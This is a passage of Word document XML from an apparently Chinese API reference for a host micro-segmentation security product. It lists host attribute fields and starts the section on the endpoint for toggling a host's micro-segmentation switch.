              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="692256CF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="143FA924" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0ED63FED" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>group</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C5F1D6C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77F88628" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2173E6AD" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69488040" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>groupName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D6CFD9B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7949DB6D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6EDB5D06" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76653AE9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>tags</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2491E219" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B9BB0D4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7F67E1DE" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="708CAF3B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>msEnabled</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="602B549B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7959A6FB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>微隔离开关：0关闭 1开启</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7E3BE1B2" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F50F70F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dcSyncNum</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7022EC90" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06DA42A8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>策略已同步数量</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5E399809" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A4E727B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dcNotSyncNum</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E8ACC9A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7DD7E358" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>策略未同步状态</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="238ADD5D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="628A6EDA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>accessControlMode</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73CB9C60" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="653B0064" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>访问控制模式: null未设置 0服务控制模式 1主机控制模式</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6009383A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="215AF4E1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>platform</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39712924" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="454415E8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>操作系统</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="39D8EA0F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5CBEE5D5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>runStatus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2283F146" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3ACBDC8D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>运行状态，运行状态: warn告警 monitor监控 protect防护</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="12820986" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51981D50" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>protectService</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53A95410" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="220AC707" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>自定义防护服务</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="657D7D66" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21B41314" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>limitOut</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="144C9EFD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A7C16A4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>出站限制,0不允许出站 1允许出站</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="539AF69D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A409A82" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>checkStatus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B7428A5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72481D5A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>检查状态</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3C2A1A37" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7AF3B4AE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>availableReason</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72677AA2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06D889C6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>不</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>可用原因</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2EEF756C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="363C8D0B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>osType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4BFBA966" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="109E960F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>操作系统类型，1：</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>， 2：windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="22115554" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33787E03" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>runLevel</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30870166" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="464D6465" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>运行级别 ，0：整除，1：降级，2：停用，3：自动降级</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="25139D59" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E033ACE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>updateUsername</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2CF3A8A9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A9A1B3C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>操作人名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="05657CE4" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C881CEB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>updateTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CCA6F6A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D20FBB7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>操作时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7B120CE9" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2174EF67" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>available</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E10FB37" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C823AAF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否是有效主机，yes：可用，no：</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>不</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3048B06A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E862F77" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>blockingSwitch</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CD7ECED" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>boolean</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02A93451" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>拦截流量开关状态</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="65C30B0F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6FA493B2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>checkStatus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17C3058F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2FB8F606" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>拦截流量检查状态</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="63DEFB6C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="068C3836" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>blackStrategyEnable</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C552976" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>boolean</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A247665" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>黑名单策略开关状态</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7C604C73" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="439" w:name="_Toc115166292"/>
      <w:bookmarkStart w:id="440" w:name="修改主机开关"/>
      <w:bookmarkEnd w:id="438"/>
      <w:r>
        <w:t>修改主机开关</w:t>
      </w:r>
      <w:bookmarkEnd w:id="439"/>
    </w:p>
    <w:p w14:paraId="1561DF67" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C41D33" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ms-srv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/hosts/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>enable</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0CA122DE"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050"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1605"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="7A56B9B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CC3635C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0EC7898E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17F4CADB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>是否必填</w:t>
            </w:r>
